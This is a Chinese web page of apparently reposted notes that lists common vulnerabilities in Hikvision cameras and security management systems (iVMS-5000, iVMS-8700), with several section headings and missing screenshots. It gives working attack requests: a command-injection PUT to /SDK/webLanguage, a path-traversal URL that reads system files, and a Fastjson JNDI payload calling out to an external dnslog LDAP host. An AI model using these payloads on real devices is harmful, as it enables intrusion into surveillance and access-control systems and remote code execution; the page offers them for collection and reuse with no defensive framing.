弱电工程师实战笔记 | 海康威视常见漏洞(收藏、持续更新)

弱口令问题

身份验证绕过

github 描述截图

命令注入问题

PUT /SDK/webLanguage HTTP/1.1
Host: x.x.x.x
...
<?xml version="1.0" encoding="UTF-8"?>

    $(ifconfig -a > webLib/dd.asp)

后台任意文件读取

http://ip/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

任意文件上传


github描述截图


海康威视综合安防系统iVMS-5000

海康威视综合安防系统 iVMS-8700

Fastjson远程命令执行

POST /bic/ssoService/v1/applyCT HTTP/1.1
...
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://2vyvoa.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}

信息泄露

展开阅读全文

页面更新:2024-02-24

标签:数据流   快照   流媒体   口令   截图   漏洞   实战   摄像机   命令   工程师   常见   版本   笔记   收藏   设备

1 2 3 4 5

上滑加载更多 ↓
推荐阅读:
友情链接:
更多:

本站资料均由网友自行发布提供,仅用于学习交流。如有版权问题,请与我联系,QQ:4156828  

© CopyRight 2020-2024 All Rights Reserved. Powered By 71396.com 闽ICP备11008920号-4
闽公网安备35020302034903号

Top